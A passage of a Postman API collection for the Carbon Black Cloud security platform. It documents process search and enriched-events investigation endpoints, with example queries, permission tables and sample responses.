Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"9ff83d0d-1191-4f76-9cad-0b3c4c4ec565"},{"name":"⚠️ Start an Asynchronous Process Search","event":[{"listen":"test","script":{"exec":["var data = pm.response.json();","pm.environment.set(\"cb_query_id\", data.query_id);",""],"type":"text/javascript","id":"8ff5166a-35d3-4f69-9991-dc6f6b9419f5"}}],"id":"5916f2f4-ff98-4f44-a8c6-dedaa0adad33","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"search_params\": {\n        \"q\": \"netconn_domain:google.com\"\n    }\n}"},"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_jobs","description":"<p>Initiate an asynchronous process search. This request will respond with a <code>query_id</code>, which can be used to fetch the results of this search.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#start-an-asynchronous-process-search\">See the Documentation</a></p>\n<hr />\n<p>🔸 Postman examples provided<br />🔹 The variable <code>cb_query_id</code> is automatically updated with the value of <code>query_id</code> in the response.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ab57c9d7-6c60-4494-a623-d093ae77573d","name":"Serch for processes by domain","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"search_params\": {\n        \"q\": \"netconn_domain:google.com\"\n    }\n}"},"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 Apr 2020 16:14:56 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"212"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"query_id\": \"d7b67649-7ce8-4807-94c5-9ecf21a9cd3b\",\n    \"query\": {\n        \"cb.max_backend_timestamp\": 1587053695886,\n        \"cb.min_backend_timestamp\": 0,\n        \"cb.min_device_timestamp\": 0,\n        \"q\": \"netconn_domain:google.com\",\n        \"rows\": 500,\n        \"start\": 0\n    }\n}"}],"_postman_id":"5916f2f4-ff98-4f44-a8c6-dedaa0adad33"},{"name":"⚠️ Get Search Process Results","id":"32a22ced-e5f5-4c1e-a197-44be5a5b7de8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_query_id}}/results","description":"<p>Retrieve results for a process search for a given <code>query_id</code> after you start a search.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-process-results\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_query_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"32a22ced-e5f5-4c1e-a197-44be5a5b7de8"},{"name":"⚠️ Cancel Process Search","id":"0c7c346c-c358-4a6f-9557-a98fdcead539","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_query_id}}","description":"<p>Cancel the process search for a given <code>query_id</code>. This is useful if a long running query needs to be modified and restarted.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#cancel-process-search\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_query_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0c7c346c-c358-4a6f-9557-a98fdcead539"},{"name":"⚠️ Get the Status of a Query","id":"54a5d761-5c32-4e5a-8ab9-971cf975f158","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_query_id}}","description":"<p>Get the status of a process search request with the given <code>query_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-the-status-of-a-query\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_query_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"54a5d761-5c32-4e5a-8ab9-971cf975f158"},{"name":"⚠️ Process Search Suggestions","id":"ee2a1a8c-d9b8-43b0-8442-cc2b7aefc2b9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_suggestions?suggest.q=&suggest.count=","description":"<p>Get suggestions for a given process search.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#process-search-suggestions\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_suggestions"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Query to generate suggestions for.</p>\n","type":"text/plain"},"key":"suggest.q","value":""},{"description":{"content":"<p>Number of suggestions to return.</p>\n","type":"text/plain"},"key":"suggest.count","value":""}],"variable":[]}},"response":[],"_postman_id":"ee2a1a8c-d9b8-43b0-8442-cc2b7aefc2b9"},{"name":"⚠️ Process Search Validation","id":"dcb82298-5cc6-40ee-b069-508b070ac2d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/search_validation?q=&cb.min_backend_timestamp=&cb.max_backend_timestamp=","description":"<p>Validate a process search query.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#process-search-validation\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","search_validation"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Query to validate.</p>\n","type":"text/plain"},"key":"q","value":""},{"description":{"content":"<p>start time for the query</p>\n","type":"text/plain"},"key":"cb.min_backend_timestamp","value":""},{"description":{"content":"<p>end time for the query</p>\n","type":"text/plain"},"key":"cb.max_backend_timestamp","value":""}],"variable":[]}},"response":[],"_postman_id":"dcb82298-5cc6-40ee-b069-508b070ac2d5"},{"name":"⚠️ Process Summary","id":"f4d9912f-f105-4375-b67f-f04e85e7d847","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/summary?process_guid=&parent_guid=","description":"<p>Retrieve a process summary for a given <code>process_guid</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#process-summary\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","summary"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Process GUID that should represent the main node of the tree</p>\n","type":"text/plain"},"key":"process_guid","value":""},{"description":{"content":"<p>Parent process for the main node process</p>\n","type":"text/plain"},"key":"parent_guid","value":""}],"variable":[]}},"response":[],"_postman_id":"f4d9912f-f105-4375-b67f-f04e85e7d847"},{"name":"⚠️ Process Tree","id":"a3e91b34-7ba1-4216-a7c6-82433d584c3b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/tree?process_guid=&parent_guid=","description":"<p>Retrieve a process tree for a given <code>process_guid</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#process-tree\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","tree"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Process GUID that should represent the main node of the tree</p>\n","type":"text/plain"},"key":"process_guid","value":""},{"description":{"content":"<p>Parent process for the main node process</p>\n","type":"text/plain"},"key":"parent_guid","value":""}],"variable":[]}},"response":[],"_postman_id":"a3e91b34-7ba1-4216-a7c6-82433d584c3b"},{"name":"⚠️ Evaluate Processes for a Watchlist","id":"dfdd22a7-8fce-4258-acd9-84f10d57b886","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/processes/watchlist_evaluation?watchlist_id=&report_id=&ioc_id=&cb.max_backend_timestamp=&cb.min_backend_timestamp=","description":"<p>Evaluate and tag processes for the given watchlist, report, and IOC.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#evaluate-processes-for-a-watchlist\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","processes","watchlist_evaluation"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Watchlist ID</p>\n","type":"text/plain"},"key":"watchlist_id","value":""},{"description":{"content":"<p>Report ID</p>\n","type":"text/plain"},"key":"report_id","value":""},{"description":{"content":"<p>ID of an IOC</p>\n","type":"text/plain"},"key":"ioc_id","value":""},{"description":{"content":"<p>Optional - latest backend timestamp to include.</p>\n","type":"text/plain"},"key":"cb.max_backend_timestamp","value":""},{"description":{"content":"<p>Optional - earliest backend timestamp to include.</p>\n","type":"text/plain"},"key":"cb.min_backend_timestamp","value":""}],"variable":[]}},"response":[],"_postman_id":"dfdd22a7-8fce-4258-acd9-84f10d57b886"},{"name":"⚠️ Get Report Hits","id":"e1b627a8-308b-4ae1-83e3-d7392a45aa3a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/search/v1/orgs/{{cb_org_key}}/report_hits?process_guid=&rows=","description":"<p>Get report hits associated with a process.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/process-search/#get-report-hits\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","search","v1","orgs","{{cb_org_key}}","report_hits"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Required. Process GUID for which to get report hits.</p>\n","type":"text/plain"},"key":"process_guid","value":""},{"description":{"content":"<p>Number of report hits to get.</p>\n","type":"text/plain"},"key":"rows","value":""}],"variable":[]}},"response":[],"_postman_id":"e1b627a8-308b-4ae1-83e3-d7392a45aa3a"}],"id":"7254152a-298f-4b50-a728-2651163a8329","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"c2237b1a-db5f-4b80-93e9-d5c80da19e71"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"f28903d4-b4ea-40de-92f1-aaa17154bf7c"}}],"_postman_id":"7254152a-298f-4b50-a728-2651163a8329","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"⚠️ Process Search v2","item":[{"name":"⚠️ Start Enriched Events Facet Job","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"91b91863-2ce3-4e81-8e88-e7755318fa73"}}],"id":"89deb212-12f7-431c-8827-7ccfa2e9a6c8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"(event_id:{{cb_event_id}})\",\n    \"terms\": {\n        \"fields\": [\n            \"event_type\",\n            \"process_name\",\n            \"process_effective_reputation\",\n            \"process_hash\",\n            \"device_name\",\n            \"process_username\",\n            \"parent_effective_reputation\",\n            \"ttp\",\n            \"netconn_location\"\n        ],\n        \"rows\": 50,\n        \"time_range\": {\n            \"start\": \"2020-05-01T14:48:03-07:00\"\n        },\n        \"start\": \"2020-05-01T14:48:03-07:00\"\n    }\n}"},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/facet_jobs","description":"<p>Creates an enriched events facet job. The results for the facet job may be requested using the job ID returned. This route will not request processes.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#start-enriched-events-facet-job\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","facet_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"89deb212-12f7-431c-8827-7ccfa2e9a6c8"},{"name":"⚠️ Get Enriched Events Facet Results","id":"056c4207-6f80-409c-85f4-4806413aeeda","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/facet_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the process facet results for a given <code>job_id</code>.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-enriched-events-facet-results\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","facet_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Maximum number of facets per category (i.e Any Process Search Fields listed in terms.fields)    </p>\n","type":"text/plain"},"key":"limit","value":"100"}],"variable":[]}},"response":[],"_postman_id":"056c4207-6f80-409c-85f4-4806413aeeda"},{"name":"⚠️ Start an Enriched Events Search Job","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"c6fcdf3b-cbce-42fa-9801-c040b7c692c8"}}],"id":"c6ec056c-c384-48e5-bdc2-3ae6e171c963","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"process_name:cmd.exe\",\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"asc\"\n        }\n    ],\n    \"fields\": [\n        \"event_time\",\n        \"event_id\",\n        \"event_type\",\n        \"org_id\",\n        \"ttp\",\n        \"device_id\",\n        \"device_internal_ip\",\n        \"device_name\",\n        \"alert_id\",\n        \"process_id\",\n        \"process_name\",\n        \"process_user\",\n        \"process_hash\",\n        \"process_guid\",\n        \"netconn_protocol\",\n        \"netconn_remote_ipv4\",\n        \"netconn_remote_ipv6\",\n        \"netconn_remote_port\",\n        \"netconn_local_ipv4\",\n        \"netconn_local_ipv6\",\n        \"netconn_local_port\",\n        \"netconn_domain\",\n        \"netconn_inbound\",\n        \"netconn_location\",\n        \"netconn_action\"\n    ],\n    \"start\": 0,\n    \"time_range\": {\n        \"end\": \"2020-04-21T00:00:00Z\",\n        \"start\": \"2020-04-19T00:00:00Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/search_jobs","description":"<p>Creates an enriched events search job. The results for the search job may be requested using the job ID returned. This route will not request facets.  </p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><blockquote>\n<p><strong>Note:</strong> See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/event-search-fields/\">Event Search Fields</a> for details on how to populate the search query.</p>\n</blockquote>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#start-an-enriched-events-search-job\">See the Documentation</a>  </p>\n<hr />\n<p>🔸 Postman examples provided<br />🔹 The variable <code>cb_job_id</code> is automatically updated with the value of <code>job_id</code> in the response.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"1b76d40f-ada5-4c5f-86c5-3e0b153e959d","name":"Search by device_id","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device_id\": [\n            {{cb_device_id}}\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 16 Apr 2020 16:53:44 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"763807e5-8b36-475e-bde4-25907e33ee96\"\n}"},{"id":"50d790e6-6a75-459e-8d01-b7a4db8c557e","name":"Events by TTP","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"query\": \"ttp:MITRE*\",\n  \"sort\": [\n    {\n      \"field\": \"device_timestamp\",\n      \"order\": \"asc\"\n    }\n  ],\n  \"fields\": [\"event_time\", \"event_id\", \"event_description\", \"event_type\", \"org_id\", \"ttp\", \"device_id\", \"device_internal_ip\", \"device_name\", \"alert_id\", \"process_cmdline\", \"process_id\", \"process_name\", \"process_user\", \"process_hash\", \"parent_guid\", \"process_guid\"],\n  \"start\": 0,\n  \"time_range\": {\n    \"end\": \"2020-04-21T00:00:00Z\",\n    \"start\": \"2020-04-19T00:00:00Z\"\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 22 Apr 2020 20:20:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"3dd488d2-6ae1-4ce5-bc69-f91cebaff0ee\"\n}"}],"_postman_id":"c6ec056c-c384-48e5-bdc2-3ae6e171c963"},{"name":"⚠️ Get Enriched Events Search Results","id":"6c451633-ad9a-48b3-ae56-7aa000dde16e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/enriched_events/search_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the enriched events search results for a given <code>job_id</code>. Results will be sorted based on the sort parameter used when starting the search.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-enriched-events-search-results\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","enriched_events","search_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Maximum number of facets per category (i.e Any Process Search Fields listed in terms.fields)    </p>\n","type":"text/plain"},"key":"start","value":"100"},{"disabled":true,"key":"rows","value":""}],"variable":[]}},"response":[],"_postman_id":"6c451633-ad9a-48b3-ae56-7aa000dde16e"},{"name":"⚠️ Get Events Facet Associated with a Given Process","id":"6a09c35d-e0f7-4f6d-a69b-2117d5ffef9e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/events/{{cb_process_guid}}/_facet","description":"<p>Get facets for the events associated with a given process. This route will not request events.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-events-facet-associated-with-a-given-process\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","events","{{cb_process_guid}}","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6a09c35d-e0f7-4f6d-a69b-2117d5ffef9e"},{"name":"⚠️ Get Events Associated with a Given Process","id":"4b11c8c6-ca64-4e40-884d-4be7f14bfda4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": \"<object>\",\n    \"exclusions\": \"<object>\",\n    \"fields\": [\n        \"<string>\",\n        \"<string>\"\n    ],\n    \"query\": \"<string>\",\n    \"rows\": \"<long>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        },\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ],\n    \"start\": \"<long>\",\n    \"time_range\": {\n        \"end\": \"<string>\",\n        \"start\": \"<string>\",\n        \"window\": \"<string>\"\n    }\n}","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/events/{{cb_process_guid}}/_search","description":"<p>Fetch the events associated with a given process. These events are often more complete the the enriched event documents but, unlike the enriched event searches, must be focused on a single process. This route will not request facets.</p>\n<h3 